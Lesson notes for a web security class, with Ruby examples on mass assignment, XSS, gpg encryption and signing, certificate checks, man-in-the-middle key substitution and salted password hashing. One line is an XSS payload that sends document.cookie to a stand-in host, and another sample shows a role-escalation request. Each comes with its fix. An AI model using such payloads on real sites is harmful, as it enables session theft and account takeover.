@BobGu
Last active May 25, 2017 13:53

Review of concepts(10 mins)

  • Privilege Escalation
    • Has to deal with authorization: the app knows who you are (authentication) but does not check whether you are allowed to do this particular thing.
    • Result: a user can do things their role does not permit, e.g. a customer performing admin actions or reading another user's data.
    • How would this apply to a multi-tenant ecommerce application? (Can a user of store A see or edit store B's orders just by changing an id in the URL?)
  • Mass Assignment Vulnerabilities

    • Example in Rails?
    • The attacker submits extra form fields the form never showed, and the model saves them because it accepts any attribute in the request.
    • Fix: a whitelist of attributes a request is allowed to assign to an object; in Rails 4+ that is strong parameters (permit only the fields the form is supposed to set).
    • Examples
      • I want to change the username and password of a user so I can gain access to their credit card.
      • Privilege escalation: change my role to super-admin so I can do what I want in the application.
  • XSS or Cross Site Scripting

    • When attacker-supplied input is placed into a page unescaped, so the browser runs it as code in other users' sessions.
    • Happens often through users injecting JavaScript through HTML: a comment, a username, a profile field that is later rendered.
    • Luckily newer versions of Rails automatically escape HTML for you: view output is escaped by default, and raw / html_safe opt out of it, so review every use of those.
    • Escape formatter: escaping happens when the value is rendered, in the formatter for that output context, not when it is stored.
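
Both review bugs in a single runnable script, added here as an example; it is not code from this gist or from Rails. The User class stands in for an ActiveRecord model, the params hashes for a Rails params hash, and the payload URL evil.example is made up:

```ruby
require "erb"

# Added example, not from the lesson or from Rails: both review-section bugs in
# plain Ruby. The User class stands in for an ActiveRecord model and the
# params hashes for a Rails params hash; the payload URL evil.example is made up.
class User
  attr_accessor :name, :email, :role

  def initialize(name:, email:, role: "customer")
    @name, @email, @role = name, email, role
  end
end

# Mass assignment, vulnerable form: every key in the request is written to the
# model, so a field the form never showed (role) is saved too.
def update_unchecked(user, params)
  params.each do |attr, value|
    user.public_send("#{attr}=", value) if user.respond_to?("#{attr}=")
  end
  user
end

# Hardened form: an allowlist of attributes, the idea behind Rails strong
# parameters (params.require(:user).permit(:name, :email)).
PERMITTED = %w[name email].freeze

def permit(params, allowed)
  params.select { |attr, _| allowed.include?(attr) }
end

def update_checked(user, params)
  update_unchecked(user, permit(params, PERMITTED))
end

# Constructed request: Mallory adds a role field to the profile form post.
TAMPERED_PARAMS = {
  "name" => "Mallory", "email" => "mallory@example.com", "role" => "super-admin"
}.freeze

# XSS: the stored name ends up in HTML. Raw interpolation hands the payload to
# the browser as markup; escaping (what Rails' <%= %> does by default) turns the
# angle brackets into entities so it is shown as text.
PAYLOAD = "<script>location='https://evil.example/?c='+document.cookie</script>"

def render_raw(name)
  "<h1>Hello #{name}</h1>"
end

def render_escaped(name)
  "<h1>Hello #{ERB::Util.html_escape(name)}</h1>"
end

def demo
  unchecked = update_unchecked(User.new(name: "Alice", email: "alice@example.com"), TAMPERED_PARAMS)
  checked = update_checked(User.new(name: "Alice", email: "alice@example.com"), TAMPERED_PARAMS)
  {
    unchecked_role: unchecked.role,        # "super-admin": the attacker promoted themselves
    checked_role: checked.role,            # "customer": role was never permitted
    raw_html: render_raw(PAYLOAD),         # contains a live <script> tag
    escaped_html: render_escaped(PAYLOAD)  # contains &lt;script&gt; instead
  }
end

puts demo if __FILE__ == $PROGRAM_NAME
```

The permit step is the whole fix for mass assignment: the attacker can still send role=super-admin, it just never reaches the model. For XSS note that the escaping sits in the render function, not in the update, because the same name may later be put into JSON or a URL where HTML entities are the wrong encoding.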

Public/Private Keys(30-50 minutes)

  • Overview of how public/private keys work
    • Whiteboard something
    • Give Verifi example
  • Drop cheatsheet gist in slack [https://gist.github.com/BobGu/af9b3df39dfbe822da86a2c6e7872133]
  • First thing we are going to do is create a public/private key pair on our computer.
    • Install gpg by running brew install gpg (the Homebrew formula is gnupg; gpg is an alias for it)
    • gpg --generate-key to generate your key
      • it will ask you to fill out a bunch of info (name, email, a passphrase that protects the private key); write down the name and email you used, you need them for --export
      • Remember public/private key pairs only work with each other! That's why they are generated together.
  • Courtney's public key is obviously public, she sends her public key to anyone that wants to send her a secure message
    • Have them look at her public key that shes created.
    • Now she will export her public key, and post it in slack.
      • To export your public key use this command gpg --output name_of_file.gpg --export email_of_user
    • Now the fun part is we are all going to send encrypted messages to Courtney
      • First we have to import her public key
        • gpg --import name_of_file.gpg
        • Importing does not verify that this key really belongs to Courtney; anyone can generate a key with her name and email on it. After the import, compare the fingerprint (gpg --fingerprint courtney@example.com) with the one Courtney reads out in the room before you trust the key. You should see output confirming the import.
      • Next we will encrypt a simple text file using Courtney's public key.
        • create a text file
        • To encrypt with Courtney's public key
        • gpg --recipient courtney@example.com --output encrypted_file.gpg --encrypt name_of_file.txt
    • Now Courtney will decrypt these messages using her private key
      • Send Courtney the encrypted messages
      • Now she will decrypt these messages
        • To decrypt a message
        • gpg --output name_of_file.txt --decrypt encrypted_file.gpg
      • Then look at the file! Use cat name_of_file.txt or vim name_of_file.txt to see the contents!
  • Get in pairs (or a group of three)
  • One person is going to be receiving the encrypted messages
  • The other person is going to be encrypting and signing the messages
  • Signatures
    • It is a way of verifying a document has come from the person you expect.
    • Think like in the old days where people would have wax seals on their envelopes. Hard to fake where the message came from unless someone jacked the seal (here: stole the private key).
    • To sign a file, the signer is going to use their private key; the receiver checks the signature with the signer's public key
    • gpg --recipient address@example.com --encrypt --sign name_of_file.txt
    • The signing key is chosen by default or can be set explicitly using the --local-user and --default-key options.
    • The decryption step happens the same way.
      • gpg --output name_of_file.txt --decrypt encrypted_file.gpg
      • You should see some output in your command line like this (this run had no --output, so the plaintext, Hello World!, went to the terminal between the gpg lines)
        gpg: encrypted with 2048-bit RSA key, ID 50CF34BACCE23953, created 2017-05-19
              "NateDog <natedog@example.com>"
        Hello World!
        gpg: Signature made Mon May 22 14:53:12 2017 PDT
        gpg:                using RSA key 889B4A169E5F3886403B554B3A4C5633C74F5CE5
        gpg: Good signature from "Robert Gu <robert@example.com>" [ultimate]
      • Read both halves: "encrypted with ... key" says which private key decrypted it, "Good signature from" (as opposed to "BAD signature") says the signer's key really produced the signature, and [ultimate] is the trust level you have assigned to that key (your own keys get ultimate).
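
The whole exercise (generate, export and import, encrypt to a recipient, sign, decrypt, verify) as one runnable Ruby script, added here as an example; it is not code from this gist and gpg itself is not involved. gpg encrypts the message under a random session key, wraps that key with the recipient's public key and signs with the sender's private key; the script does the same with AES-256-GCM, RSA-OAEP and RSA/SHA-256 from Ruby's OpenSSL bindings. Courtney and Nate are the lesson's participants; the message text and the impostor key are constructed:

```ruby
require "openssl"

# Added example, not from the lesson: the gpg workflow above (generate, export and
# import, encrypt to a recipient, sign, decrypt, verify) done with Ruby's OpenSSL
# bindings. Like gpg it encrypts the message under a random session key, wraps
# that key with the recipient's public key and signs with the sender's private
# key; here that is AES-256-GCM, RSA-OAEP and RSA/SHA-256. Courtney and Nate are
# the lesson's participants; the message text and the impostor are constructed.
OAEP = OpenSSL::PKey::RSA::PKCS1_OAEP_PADDING

# gpg --generate-key: both halves are made together; the private half stays here.
def generate_keypair
  OpenSSL::PKey::RSA.new(2048)
end

# gpg --export / --import: only the public half travels, as PEM text.
def export_public_key(keypair)
  keypair.public_key.to_pem
end

def import_public_key(pem)
  OpenSSL::PKey::RSA.new(pem)
end

# gpg --fingerprint: hash of the public key, compared out of band, because
# importing a key proves nothing about who owns it.
def fingerprint(pem)
  OpenSSL::Digest::SHA256.hexdigest(OpenSSL::PKey::RSA.new(pem).to_der).upcase.scan(/..../).join(" ")
end

# gpg --recipient ... --encrypt --sign
def encrypt_and_sign(plaintext, recipient_public_key, sender_private_key)
  signature = sender_private_key.sign(OpenSSL::Digest.new("SHA256"), plaintext)
  cipher = OpenSSL::Cipher.new("aes-256-gcm").encrypt
  session_key = cipher.random_key
  iv = cipher.random_iv
  ciphertext = cipher.update(plaintext) + cipher.final
  { wrapped_key: recipient_public_key.public_encrypt(session_key, OAEP),
    iv: iv, ciphertext: ciphertext, tag: cipher.auth_tag, signature: signature }
end

# gpg --decrypt: only the recipient's private key unwraps the session key; the
# signature is then checked with the sender's public key ("Good signature from").
def decrypt_and_verify(envelope, recipient_private_key, sender_public_key)
  session_key = recipient_private_key.private_decrypt(envelope[:wrapped_key], OAEP)
  cipher = OpenSSL::Cipher.new("aes-256-gcm").decrypt
  cipher.key = session_key
  cipher.iv = envelope[:iv]
  cipher.auth_tag = envelope[:tag]
  plaintext = cipher.update(envelope[:ciphertext]) + cipher.final
  { plaintext: plaintext,
    good_signature: sender_public_key.verify(OpenSSL::Digest.new("SHA256"), envelope[:signature], plaintext) }
end

# true if the block raises one of the given errors, false if it completes.
def fails?(error_classes)
  yield
  false
rescue *error_classes
  true
end

# The classroom exercise, plus three things that must fail.
def run_exercise
  courtney, nate, impostor = generate_keypair, generate_keypair, generate_keypair
  courtney_pub = import_public_key(export_public_key(courtney))
  nate_pub = import_public_key(export_public_key(nate))

  envelope = encrypt_and_sign("Hello World!", courtney_pub, nate)
  result = decrypt_and_verify(envelope, courtney, nate_pub)

  # Signed by someone else but presented as Nate's: decrypts, signature check fails.
  forged = decrypt_and_verify(encrypt_and_sign("Hello World!", courtney_pub, impostor), courtney, nate_pub)

  # One flipped ciphertext byte: GCM's tag check rejects it before anything is returned.
  tampered_ct = envelope[:ciphertext].dup
  tampered_ct.setbyte(0, tampered_ct.getbyte(0) ^ 0xff)
  tampered = envelope.merge(ciphertext: tampered_ct)

  { plaintext: result[:plaintext],
    good_signature: result[:good_signature],
    forged_signature_rejected: !forged[:good_signature],
    tamper_detected: fails?([OpenSSL::Cipher::CipherError]) { decrypt_and_verify(tampered, courtney, nate_pub) },
    wrong_key_fails: fails?([OpenSSL::PKey::PKeyError]) { decrypt_and_verify(envelope, nate, nate_pub) },
    courtney_fingerprint: fingerprint(export_public_key(courtney)) }
end

puts run_exercise if __FILE__ == $PROGRAM_NAME
```

Two points the gpg commands hide: the message itself is encrypted with a symmetric cipher and only the short session key is RSA-encrypted (RSA alone could not encrypt a file larger than the key), and the signature is made with the sender's private key over the plaintext while the wrapping uses the recipient's public key, which is why one gpg command needs both keys.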
        
        

Where are public/private keys used

  • In PGP (Pretty Good Privacy); gpg is the GNU implementation of the OpenPGP standard, so it is what you just used
    • Give an example from real job
  • SSH (Secure Shell)
    • SSH key based authentication: the server holds your public key and challenges you to prove you hold the matching private key, so no password is sent
    • GitHub uses it
      • Have them go to their ~/.ssh/id_rsa.pub
      • This is the public key that they put on GitHub so the key based authentication will work; the id_rsa file next to it is the private key and never gets uploaded anywhere
  • SSL (Secure Sockets Layer; today its successor TLS)
    • It keeps data encrypted in transit between the client and the server, so anyone on the path sees only ciphertext
    • Authenticates the server to the client through a certificate
      • A certificate contains the server's public key together with its name (domain) and an expiry; the matching private key never leaves the server. The client uses the public key to verify the server (and, in older RSA key exchange, to encrypt the session key); only the holder of the private key can complete the handshake.
    • A certificate authority has its own private/public key pair. It signs server certificates with its private key; the CA's public key ships in your browser or OS trust store, so the client can verify that signature and know the certificate was issued by a CA it trusts
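
The certificate part of those notes in code, added here as an example (not from this gist): a CA signs a server certificate with the CA's private key, the client verifies it with the CA's public key it already trusts and then checks that the name it connected to appears in the certificate. The names (Example Root CA, Rogue CA, shop.example.com, evil.example.com) are constructed:

```ruby
require "openssl"

# Added example, not from the lesson: the certificate part of the SSL/TLS notes
# above in code. A CA signs a server certificate with the CA's private key; the
# client checks that signature with the CA's public key it already trusts, and
# checks that the name it connected to is in the certificate. Names (Example
# Root CA, Rogue CA, shop.example.com, evil.example.com) are constructed.

def build_certificate(subject:, public_key:, issuer_cert:, issuer_key:, serial:, ca:, dns: nil)
  cert = OpenSSL::X509::Certificate.new
  cert.version = 2                     # X.509 v3, required for extensions
  cert.serial = serial
  cert.subject = OpenSSL::X509::Name.parse("/CN=#{subject}")
  cert.issuer = issuer_cert ? issuer_cert.subject : cert.subject   # no issuer: self-signed root
  cert.public_key = public_key         # the certificate carries only the PUBLIC key
  cert.not_before = Time.now - 60
  cert.not_after = Time.now + 365 * 24 * 3600
  ef = OpenSSL::X509::ExtensionFactory.new
  ef.subject_certificate = cert
  ef.issuer_certificate = issuer_cert || cert
  cert.add_extension(ef.create_extension("basicConstraints", ca ? "CA:TRUE" : "CA:FALSE", true))
  cert.add_extension(ef.create_extension("subjectAltName", "DNS:#{dns}", false)) if dns
  cert.sign(issuer_key, OpenSSL::Digest.new("SHA256"))   # signed with the ISSUER's private key
  cert
end

# A CA is just a key pair plus a self-signed certificate that clients are told to trust.
def make_ca(name)
  key = OpenSSL::PKey::RSA.new(2048)
  cert = build_certificate(subject: name, public_key: key.public_key, issuer_cert: nil,
                           issuer_key: key, serial: 1, ca: true)
  { key: key, cert: cert }
end

# The server generates its own key pair; the CA never sees the private half.
def issue_server_cert(ca, hostname, serial)
  key = OpenSSL::PKey::RSA.new(2048)
  cert = build_certificate(subject: hostname, public_key: key.public_key, issuer_cert: ca[:cert],
                           issuer_key: ca[:key], serial: serial, ca: false, dns: hostname)
  { key: key, cert: cert }
end

# What a browser does with the certificate the server presents.
def client_trusts?(server_cert, trusted_ca_certs, hostname)
  store = OpenSSL::X509::Store.new           # stands in for the OS/browser trust store
  trusted_ca_certs.each { |c| store.add_cert(c) }
  chain_ok = store.verify(server_cert)       # signature by a trusted CA, validity dates
  name_ok = OpenSSL::SSL.verify_certificate_identity(server_cert, hostname)
  { chain_ok: chain_ok, name_ok: name_ok, trusted: chain_ok && name_ok,
    error: chain_ok ? nil : store.error_string }
end

def run_scenarios
  trusted_ca = make_ca("Example Root CA")
  rogue_ca = make_ca("Rogue CA")                     # anyone can make a CA; nobody trusts it
  legit = issue_server_cert(trusted_ca, "shop.example.com", 2)
  rogue = issue_server_cert(rogue_ca, "shop.example.com", 2)   # same name, wrong signer
  {
    legit: client_trusts?(legit[:cert], [trusted_ca[:cert]], "shop.example.com"),
    wrong_host: client_trusts?(legit[:cert], [trusted_ca[:cert]], "evil.example.com"),
    rogue_issuer: client_trusts?(rogue[:cert], [trusted_ca[:cert]], "shop.example.com"),
    # The certificate that goes out to clients contains no private key material.
    private_key_stays_on_server: legit[:cert].check_private_key(legit[:key]) &&
                                 !legit[:cert].to_pem.include?("PRIVATE")
  }
end

puts run_scenarios if __FILE__ == $PROGRAM_NAME
```

The rogue_issuer case is the one to dwell on: the certificate is perfectly well formed and carries the right hostname, it is only rejected because no key in the client's trust store signed it. The wrong_host case shows the second check a client has to do itself; a valid certificate for some other site is still worthless for this connection.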

Man in the middle(10-15 minutes)

  • The person doing this is looking to monitor (or alter) traffic in some way
    • What is some information that belongs to a request which I can monitor? (headers, cookies and session tokens, form bodies, the URL itself)
  • MITM attack at a high level: the attacker sits between the two parties and relays messages, so each side believes it is talking directly to the other. Without authentication of the far end (a certificate, a fingerprint checked out of band) neither side can tell the difference.
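
A key-substitution man in the middle on the "post your public key in Slack" step of the exercise above, added here as an example (not from this gist). Courtney and Nate are the lesson's participants; "Mallory" the attacker, the message text and the channel being attacked are assumptions. The same script shows the check that stops it:

```ruby
require "openssl"

# Added example, not from the lesson: a key-substitution man in the middle on
# the "post your public key in Slack" step above. Courtney and Nate are the
# lesson's participants; "Mallory" the attacker and the message text are made up.
OAEP = OpenSSL::PKey::RSA::PKCS1_OAEP_PADDING

# SHA-256 over the public key, the value Courtney would read out in person.
def fingerprint(pem)
  OpenSSL::Digest::SHA256.hexdigest(OpenSSL::PKey::RSA.new(pem).to_der)
end

# Mallory controls the channel the public key and the ciphertext travel over.
class Mallory
  attr_reader :captured

  def initialize
    @key = OpenSSL::PKey::RSA.new(2048)
    @captured = []
  end

  # Step 1: intercept the key handoff and forward Mallory's own public key.
  def relay_public_key(real_pem)
    @real_recipient = OpenSSL::PKey::RSA.new(real_pem)
    @key.public_key.to_pem
  end

  # Step 2: the ciphertext was made for Mallory's key, so Mallory reads it,
  # then re-encrypts to the real recipient so Courtney sees a normal message.
  def relay_message(ciphertext)
    plaintext = @key.private_decrypt(ciphertext, OAEP)
    @captured << plaintext
    @real_recipient.public_encrypt(plaintext, OAEP)
  end
end

# Nate's side. With expected_fingerprint set, he compares the key he received
# with what Courtney told him out of band before encrypting anything.
def send_message(message, received_pem, expected_fingerprint: nil)
  if expected_fingerprint && fingerprint(received_pem) != expected_fingerprint
    return { sent: false, reason: "fingerprint mismatch, refusing to encrypt" }
  end
  { sent: true, ciphertext: OpenSSL::PKey::RSA.new(received_pem).public_encrypt(message, OAEP) }
end

def run_scenario(check_fingerprint:)
  courtney = OpenSSL::PKey::RSA.new(2048)
  mallory = Mallory.new
  real_pem = courtney.public_key.to_pem
  pem_nate_sees = mallory.relay_public_key(real_pem)         # already swapped
  expected = check_fingerprint ? fingerprint(real_pem) : nil  # read out in the room

  outcome = send_message("meet at noon", pem_nate_sees, expected_fingerprint: expected)
  unless outcome[:sent]
    return { intercepted: false, courtney_got_message: false, reason: outcome[:reason] }
  end

  delivered = courtney.private_decrypt(mallory.relay_message(outcome[:ciphertext]), OAEP)
  { intercepted: mallory.captured.include?("meet at noon"),
    courtney_got_message: delivered == "meet at noon",
    reason: nil }
end

if __FILE__ == $PROGRAM_NAME
  puts "no check:   #{run_scenario(check_fingerprint: false)}"   # read by Mallory, delivered anyway
  puts "with check: #{run_scenario(check_fingerprint: true)}"    # Nate refuses to send
end
```

Without the check the message is encrypted end to end and Courtney receives exactly what Nate typed, yet Mallory has read it; encryption alone buys nothing when the key you encrypt to is the attacker's. The fingerprint comparison is the hand-rolled version of what a CA-signed certificate does for a browser.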

Password security(10-15 mins)

  • Brute force: try candidate passwords (wordlists, common patterns) against the stored hashes until one matches
  • bcrypt
    • Hash - one way: you can compute the hash from the password but not the password from the hash, so the site never stores the password itself
    • Salt: a random per-user value mixed into the hash, so two users with the same password get different hashes and precomputed tables are useless
    • Rainbow tables: precomputed password-to-hash lookups; they only work against unsalted hashes
    • Bcrypt is slow on purpose (tunable work factor), so every guess costs the attacker real time; a plain SHA-256 can be computed billions of times per second on a GPU
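
Those four points as a runnable comparison, added here as an example (not from this gist). PBKDF2-HMAC-SHA256 from Ruby's standard library stands in for bcrypt, since it is the same idea (salted and deliberately slow) and needs no gem; in a Rails app you would use has_secure_password and the bcrypt gem. The wordlist and passwords are constructed:

```ruby
require "openssl"
require "securerandom"

# Added example, not from the lesson: unsalted hashing versus salted, slow
# hashing. PBKDF2-HMAC-SHA256 from Ruby's standard library stands in for bcrypt
# (same idea: salted and deliberately slow); in a Rails app use has_secure_password
# and the bcrypt gem. The wordlist and passwords are constructed.
ITERATIONS = 100_000           # the "work factor"; raise it as hardware gets faster

# The naive scheme: one fast hash over the password, no salt.
def unsalted_hash(password)
  OpenSSL::Digest::SHA256.hexdigest(password)
end

# A rainbow/lookup table: hash every candidate once, reuse against every leaked
# hash. Same password => same hash, so one hit cracks every user who chose it.
def build_lookup_table(wordlist)
  wordlist.to_h { |word| [unsalted_hash(word), word] }
end

def crack_unsalted(stored_hash, table)
  table[stored_hash]
end

# Salted and slow. The stored string carries scheme, iterations and salt so the
# check can recompute the same derivation later.
def hash_password(password, salt: SecureRandom.random_bytes(16), iterations: ITERATIONS)
  dk = OpenSSL::KDF.pbkdf2_hmac(password, salt: salt, iterations: iterations, length: 32, hash: "sha256")
  "pbkdf2-sha256$#{iterations}$#{salt.unpack1('H*')}$#{dk.unpack1('H*')}"
end

def verify_password(password, stored)
  _scheme, iterations, salt_hex, dk_hex = stored.split("$")
  dk = OpenSSL::KDF.pbkdf2_hmac(password, salt: [salt_hex].pack("H*"), iterations: iterations.to_i,
                                length: 32, hash: "sha256")
  constant_time_equal?(dk.unpack1("H*"), dk_hex)
end

# Compare every byte so timing does not leak how much of the hash matched.
def constant_time_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Rough cost ratio: one slow hash versus a thousand fast ones.
def slow_vs_fast_ratio
  clock = -> { Process.clock_gettime(Process::CLOCK_MONOTONIC) }
  t = clock.call
  1000.times { unsalted_hash("letmein") }
  fast = clock.call - t
  t = clock.call
  hash_password("letmein")
  (clock.call - t) / fast
end

WORDLIST = %w[password 123456 letmein qwerty welcome1].freeze   # constructed

def demo
  table = build_lookup_table(WORDLIST)
  alice = unsalted_hash("letmein")              # "leaked" unsalted hashes
  bob = unsalted_hash("letmein")
  alice_salted = hash_password("letmein")
  bob_salted = hash_password("letmein")
  {
    cracked_alice: crack_unsalted(alice, table),   # "letmein"
    same_hash_unsalted: alice == bob,              # true: the dump shows who shares a password
    same_hash_salted: alice_salted == bob_salted,  # false
    salted_login_ok: verify_password("letmein", alice_salted),
    salted_login_bad: verify_password("letmein1", alice_salted),
    slow_vs_fast: slow_vs_fast_ratio.round(1)
  }
end

puts demo if __FILE__ == $PROGRAM_NAME
```

Salt defeats the table because the attacker would need one table per salt value; the iteration count defeats brute force because each guess now costs the same 100,000 HMAC computations the legitimate login pays once. Storing the iteration count with the hash is what lets you raise it later without invalidating old accounts.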

CFU(5-10 mins)

  • What is a public/private key pair?
  • How are public private keys used?
  • What is a man in the middle attack?
  • Why do you hash and salt your passwords?